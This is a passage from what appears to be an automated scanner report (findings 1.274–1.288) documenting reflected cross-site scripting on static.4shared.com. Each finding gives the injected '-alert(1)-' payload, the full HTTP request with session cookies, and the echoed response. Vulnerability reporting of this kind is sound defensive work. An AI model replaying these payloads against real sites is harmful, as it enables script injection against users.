var url="/abuse.jsp?aLink=http://static.4shared.com/jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.274. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_viewport.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc2d"-alert(1)-"2c2ee3eca79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_viewport.jsccc2d&quot;-alert(1)-&quot;2c2ee3eca79
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DFCAF3D03EAF65592088FA7DE98267CF.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:21 GMT
Content-Length: 36169


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.275. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_writedrag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77c70"-alert(1)-"b6cb32f2907 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js77c70&quot;-alert(1)-&quot;b6cb32f2907/dw_writedrag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B42FB6A3B5C40554B67136CE43B3F3A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.276. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_writedrag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfe"-alert(1)-"82ae5dcc5d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_writedrag.jsd0dfe&quot;-alert(1)-&quot;82ae5dcc5d6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FDAEE0E2122E00D757F4E27374A656D.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.277. http://static.4shared.com/js/index.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9c5"-alert(1)-"97dd4e6f4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscb9c5"-alert(1)-"97dd4e6f4ff/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jscb9c5&quot;-alert(1)-&quot;97dd4e6f4ff/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44D71914FF632BBB045AD7386A660F6A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jscb9c5"-alert(1)-"97dd4e6f4ff/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.278. http://static.4shared.com/js/index.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93e21"-alert(1)-"78ca177c741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.js93e21"-alert(1)-"78ca177c741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/index.js93e21&quot;-alert(1)-&quot;78ca177c741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0BDD0F053EB06C78C9916D42FCFFE7AC.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:56 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/index.js93e21"-alert(1)-"78ca177c741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.279. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e7d"-alert(1)-"6b8c1a3bc02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js41e7d&quot;-alert(1)-&quot;6b8c1a3bc02/jquery-1.4.4.min.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=27959477059AB3FDE308F3E82A184D47.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.280. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2749"-alert(1)-"ee01858fec6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/jquery-1.4.4.min.jsa2749&quot;-alert(1)-&quot;ee01858fec6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=645AD265F2FDE7DEF72BC64223084E6E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:57 GMT
Content-Length: 36194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.281. http://static.4shared.com/js/login_fnc.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/login_fnc.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd0d"-alert(1)-"c510e79c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /jsdcd0d&quot;-alert(1)-&quot;c510e79c899/login_fnc.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1B8B1596CCAE89B1C7DAED6AB2D79C1E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.282. http://static.4shared.com/js/login_fnc.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/login_fnc.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbfde"-alert(1)-"8729de527e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/login_fnc.jsdbfde"-alert(1)-"8729de527e7?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /js/login_fnc.jsdbfde&quot;-alert(1)-&quot;8729de527e7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4B8B80CCAEE7DF3FF35B41734250E503.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/login_fnc.jsdbfde"-alert(1)-"8729de527e7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.283. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b36e"-alert(1)-"a65e025b9c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js2b36e&quot;-alert(1)-&quot;a65e025b9c0/plugins/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4079419CE468B6201E564B4D4B0AFC13.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:54 GMT
Content-Length: 36230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

1.284. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938f0"-alert(1)-"0ba47aec0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins938f0&quot;-alert(1)-&quot;0ba47aec0e3/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=98C9E08BA66033E05F22FEFFAB2D92E6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:00 GMT
Content-Length: 36230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.285. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e541a"-alert(1)-"0f1b43c7c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins/jquery.openid.jse541a&quot;-alert(1)-&quot;0f1b43c7c9d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C143464BBA385C37A4E2F937E7C446F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:05 GMT
Content-Length: 36219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.286. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1f89"-alert(1)-"d8bdea6d6a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsc1f89&quot;-alert(1)-&quot;d8bdea6d6a7/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=37539B6328ADF8C92CE74F121083CDC1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:50 GMT
Content-Length: 36195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

1.287. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 871d8"-alert(1)-"3e7896575aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/signup-script.jsp871d8"-alert(1)-"3e7896575aa?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp871d8&quot;-alert(1)-&quot;3e7896575aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FA208822AC4E87AC84DD6BBC3E34F4F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/signup-script.jsp871d8"-alert(1)-"3e7896575aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.288. http://static.4shared.com/press_room/press_room.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /press_room/press_room.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7306f"-alert(1)-"185336a2aa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

